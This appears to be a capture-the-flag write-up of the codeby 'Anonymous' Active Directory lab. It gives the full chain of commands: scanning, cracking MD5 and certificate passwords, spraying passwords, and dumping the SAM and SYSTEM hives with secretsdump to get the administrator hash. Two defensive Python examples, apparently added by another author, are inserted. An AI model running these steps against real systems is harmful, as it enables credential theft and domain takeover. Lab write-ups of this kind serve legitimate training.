Anonymous codeby Walkthrough
Hello guys and a happy new year. Welcome back to another walkthrough; this time we are going to be looking at a box called Anonymous from codeby, an easy machine in my opinion. We'll start off by running an nmap scan and discover that it has a lot of ports open, but most importantly that it is an Active Directory domain controller. All the standard enumeration reveals that the entry point is most likely not a misconfiguration in Active Directory itself. Running gobuster on the web application reveals a directory called database, which contains a .sql dump holding the credentials of an Active Directory user called veronika.koltsova. The password has been hashed with MD5 and cracking it is a piece of cake, which gives us the plaintext credentials. Authenticating to the box through WinRM gives us a password-protected .pfx certificate file. Cracking that password with John the Ripper gives us another password, and trying it against the list of users yields a successful result. That user has SeBackupPrivilege enabled, hence we can simply back up the SAM and SYSTEM hives of the domain controller, transfer them to our machine and extract the NTLM hashes. Get the administrator hash and finally pwn the box. Let's jump in.
I began by running an nmap scan on the box using the command
nmap --privileged -sC -sV -oA nmap/ad 192.168.2.20
The results are as follows
# Nmap 7.95 scan initiated Sat Feb 1 15:35:03 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -oA nmap/ad 192.168.2.20
Nmap scan report for 192.168.2.20
Host is up (0.20s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-01 12:35:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: codeby.cdb0., Site: Default-First-Site-Name)
443/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: RedCock Farm
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: codeby.cdb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=anon.codeby.cdb
| Not valid before: 2024-11-15T20:04:35
|_Not valid after: 2025-05-17T20:04:35
| rdp-ntlm-info:
| Target_Name: CODEBY
| NetBIOS_Domain_Name: CODEBY
| NetBIOS_Computer_Name: ANON
| DNS_Domain_Name: codeby.cdb
| DNS_Computer_Name: anon.codeby.cdb
| DNS_Tree_Name: codeby.cdb
| Product_Version: 10.0.20348
|_ System_Time: 2025-02-01T12:35:36+00:00
|_ssl-date: 2025-02-01T12:35:47+00:00; 0s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8082/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: RedCock Farm
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: Host: ANON; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-01T12:35:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 1 15:35:58 2025 -- 1 IP address (1 host up) scanned in 54.76 seconds
Low-hanging fruit on the AD side did not yield any results, like checking whether the SMB shares can be accessed through a null (guest) session. The command I used was
smbclient -N -L //192.168.2.20/
Trying to query LDAP anonymously with the command below gives an error
ldapsearch -x -H ldap://192.168.2.20/ -b "DC=codeby,DC=cdb" -s sub
Also, trying to reach MSRPC (Microsoft Remote Procedure Call) through a null session with rpcclient gives an error. The command was
rpcclient -U "" -N 192.168.2.20
But the nmap result shows us that we have web servers running on ports 443 and 8082.
Port 443 kept giving me an error
Port 8082 serves a web application with a login page.
The site has multiple vulnerabilities, like broken object level authorization (BOLA): a vulnerability that occurs when an application or API grants access to data objects based on the user's role but fails to verify that the user is actually authorized to access those specific objects. But since the site is down, I am unable to show these vulnerabilities.
Given that they didn't lead to the solution, that's okay; we can showcase the same vulnerabilities in a different walkthrough. Directory brute forcing with gobuster gives interesting results. The command used to run gobuster is as follows
gobuster dir -u http://192.168.2.20:8082/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 30
The most interesting directory was Database
Navigating to it we get an interesting database dump called farm.sql
I downloaded the dump and, looking through it, we see some user credentials dumped from the database
(2, 1002, 'Admin', 'admin', 'Nikhil', 'Bhalerao', 9213979339, 'ndbhalerao91@gmail.com', 1, 'nikhil.png', '9ef87721f1241ba03fdb094bc47b157b', '2022-03-15 10:18:39'),
(9, 1003, 'Admin', 'staff', 'Veronika', 'Koltsova', 9050909090, 'veronika.koltsova@codeby.cdb', 1, 'pic_3.jpg', '1755250e750575059312c899278081b2', '2024-03-15 10:18:3
I tried cracking both hashes (ndbhalerao91@gmail.com and veronika.koltsova@codeby.cdb) and successfully cracked the one for veronika.koltsova@codeby.cdb
I didn't crack the hash with hashcat; I used CrackStation instead because it's faster. It works here because the hash is a plain, unsalted MD5 digest, so it can simply be looked up in a precomputed table.
veronika.koltsova@codeby.cdb:T.T.10_friendship-forever
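Since the dump above stores passwords as bare, unsalted MD5 digests, here is an added Python example (mine, not code from the walkthrough or from the box) that audits a SQL dump for that pattern and shows the storage scheme that would have defeated a table lookup: a per-user random salt with a slow KDF (PBKDF2-HMAC-SHA256). The sample rows, e-mail addresses and digests are constructed for the example; nothing is taken from the real farm.sql.

```python
import hashlib
import hmac
import os
import re

# Constructed sample rows in the layout of the farm.sql dump quoted above.
# Every value here is made up for this example; nothing comes from the real dump.
SAMPLE_DUMP = """
INSERT INTO `tbl_user` VALUES
(1, 1001, 'Admin', 'admin', 'Alice', 'Example', 9000000001, 'alice@example.test', 1, 'a.png', '5f4dcc3b5aa765d61d8327deb882cf99', '2022-03-15 10:18:39'),
(2, 1002, 'Admin', 'staff', 'Bob', 'Example', 9000000002, 'bob@example.test', 1, 'b.jpg', '900150983cd24fb0d6963f7d28e17f72', '2024-03-15 10:18:39');
"""

# One parenthesised value tuple of an INSERT ... VALUES statement (assumes no
# parentheses inside string literals, which holds for this table layout).
TUPLE_RE = re.compile(r"\(([^()]*)\)")
# One SQL literal inside a tuple: a single-quoted string (group 1) or a bare number (group 2).
FIELD_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|(-?\d+)")
# A bare 32-hex-character field is the footprint of an unsalted MD5 digest.
MD5_SHAPED = re.compile(r"^[0-9a-f]{32}$")


def parse_tuples(dump):
    """Return one list of string fields per value tuple in the dump."""
    rows = []
    for tup in TUPLE_RE.finditer(dump):
        fields = []
        for m in FIELD_RE.finditer(tup.group(1)):
            fields.append(m.group(1) if m.group(1) is not None else m.group(2))
        rows.append(fields)
    return rows


def find_weak_credentials(dump):
    """Return (email, digest) for every row that pairs an e-mail with an MD5-shaped hash field."""
    weak = []
    for fields in parse_tuples(dump):
        email = next((f for f in fields if "@" in f), None)
        digest = next((f for f in fields if MD5_SHAPED.match(f)), None)
        if email and digest:
            weak.append((email, digest))
    return weak


def md5_matches(candidate, digest):
    """Why a lookup table works: with no salt, one MD5 per candidate (or one
    precomputed table) covers every user in the dump at once."""
    return hmac.compare_digest(hashlib.md5(candidate.encode()).hexdigest(), digest)


# How the dump should have stored passwords: per-user random salt plus a slow KDF.
PBKDF2_ROUNDS = 600_000  # current OWASP guidance for PBKDF2-HMAC-SHA256


def hash_password(password, salt=None):
    """Return a self-describing record: algorithm$rounds$salt_hex$derived_key_hex."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the KDF with the stored salt and rounds, then compare in constant time."""
    algo, rounds, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported scheme {algo}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for email, digest in find_weak_credentials(SAMPLE_DUMP):
        print(f"{email}: unsalted MD5-shaped hash {digest}")
    record = hash_password("password")
    print("salted record:", record)
    print("verify:", verify_password("password", record))
```

Run against a real dump, `find_weak_credentials` is the triage step: any row it flags is crackable by table lookup without touching the application. The PBKDF2 record format embeds the salt and iteration count so the cost can be raised later without breaking existing users.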
Trying the credentials on SMB worked and we are able to list the shares. The command I used was
netexec smb 192.168.2.20 -u "veronika.koltsova" -p "T.T.10_friendship-forever" --shares
Since WinRM (port 5985) was open, I tried the credentials there too and they worked. The command I used was
evil-winrm -i 192.168.2.20 -u "veronika.koltsova" -p "T.T.10_friendship-forever"
Looking in the Documents directory we find a .pfx file
I downloaded the certificate back to my box using the command
download user.pfx
The certificate is protected with a password. To crack it I need to convert the .pfx file into a format that John the Ripper understands, so I used a program called pfx2john and the command
pfx2john user.pfx
I saved the hash to a file and tried cracking it with John the Ripper. The command I used was
john --wordlist=~/Desktop/boxes/wordlist/rockyou.txt pfx_hash
We get the password: G0d0fWar. Next we can try to pass the certificate, i.e. authenticate to the domain with it. A good blog post about the technique is below
First we need to strip the password from the .pfx file, and I used the tool certipy to do that. The command I used was
certipy-ad cert -export -pfx "user.pfx" -password "G0d0fWar" -out "unprotected.pfx"
Next I tried authenticating to the domain with the unprotected certificate using the command
certipy-ad auth -pfx "unprotected.pfx" -dc-ip '192.168.2.20' -domain 'codeby.cdb'
But the certificate carries no identification information, so we cannot simply read off which user it belongs to.
There are many ways to dump all the users in a domain. I've shown impacket-lookupsid before, but for this walkthrough I'll use rpcclient. To authenticate via rpcclient I used the command
rpcclient -U "codeby.cdb\veronika.koltsova" 192.168.2.20
We've authenticated successfully. Next I'll use the enumdomusers command to get all Active Directory users
There are a lot of users, so I copied them to a file and formatted them to keep only the username using the command
cat users.tmp | awk -F \[ '{print $2}' | awk -F \] '{print $1}'
Using the usernames I created a brute-force script that takes one user at a time and tries authenticating with that username and the unprotected certificate file.
The script is as below
#!/bin/bash
# Try the unprotected certificate against every enumerated domain user.
# Input file: one username per line (the output of the awk pipeline above).
INFILE=/home/musyoka/Desktop/boxes/box_writeups/codeby/users

# Read the input file line by line. `read -r` keeps backslashes intact, and the
# `|| [ -n "$LINE" ]` clause still processes a final line without a trailing newline.
while IFS= read -r LINE || [ -n "$LINE" ]; do
    [ -z "$LINE" ] && continue   # skip blank lines
    echo "$LINE"
    certipy-ad auth -pfx unprotected.pfx -dc-ip 192.168.2.20 -username "$LINE" -domain codeby.cdb
done < "$INFILE"
But after running the script no valid user was found.
Though I wouldn't recommend doing the above in a real environment, since it is bad OPSEC: every attempt leaves a failed authentication event on the domain controller.
But remember we have a new password and a list of valid Active Directory accounts, so I tried the .pfx certificate password against all of them (a password spray). The command I used was
netexec smb 192.168.2.20 -u users -p "G0d0fWar" --shares
Looking at the output (screenshot below) we see that the password belongs to zoya.minina
Logging in via WinRM works. The command used was
evil-winrm -i 192.168.2.20 -u "zoya.minina" -p "G0d0fWar"
Running whoami /all we see that we have SeBackupPrivilege, which allows reading any file on the system regardless of its ACL, including the registry hives.
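To make the SeBackupPrivilege finding concrete from the defender's side, here is an added Python example (not part of the walkthrough) that parses the privileges table printed by `whoami /all` (or `whoami /priv`) and flags the entries that amount to full control of the host. The sample output is constructed: the privilege names and descriptions are the real Windows ones, but which privileges appear and their states are made up. It goes beyond the page's single privilege by covering the other high-impact privileges a blue team would hunt for in the same output.

```python
import re

# Constructed sample in the layout of the PRIVILEGES INFORMATION section of `whoami /all`.
# Names and descriptions are the real Windows strings; the selection and states are made up.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges that let their holder escalate to full control of the host.
HIGH_IMPACT = {
    "SeBackupPrivilege": "read any file regardless of its ACL (e.g. the SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "open any process, including those running as SYSTEM",
    "SeImpersonatePrivilege": "impersonate any client token the process can obtain",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeLoadDriverPrivilege": "load a kernel-mode driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

# One table row: privilege name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} for every table row in whoami output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def high_impact_privileges(text):
    """Return (name, state, impact) for each high-impact privilege held by the token.

    A Disabled privilege is still present in the token and the process can enable it
    itself (AdjustTokenPrivileges), so both states are reported.
    """
    privs = parse_privileges(text)
    return sorted(
        (name, state, HIGH_IMPACT[name])
        for name, state in privs.items()
        if name in HIGH_IMPACT
    )


if __name__ == "__main__":
    for name, state, impact in high_impact_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {impact}")
```

On a domain controller SeBackupPrivilege is normally inherited from membership of Backup Operators, so the preventive control is to keep that group empty or tightly reviewed; the parser above is the corresponding check you can run over collected `whoami /all` output from hosts or from a session you are investigating.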
The following article helps to perform the attack
We just need to back up the SAM and SYSTEM hives. The commands I used were
reg save hklm\sam C:\windows\temp\sam.hive
reg save hklm\system C:\windows\temp\system.hive
I copied both of them to my machine and, using impacket-secretsdump, extracted the administrator's hash with the command
impacket-secretsdump -sam sam.hive -system system.hive local
We can now log in to the Active Directory domain controller as administrator using the command
And the box is pretty much done, though there wasn't much Active Directory material to showcase.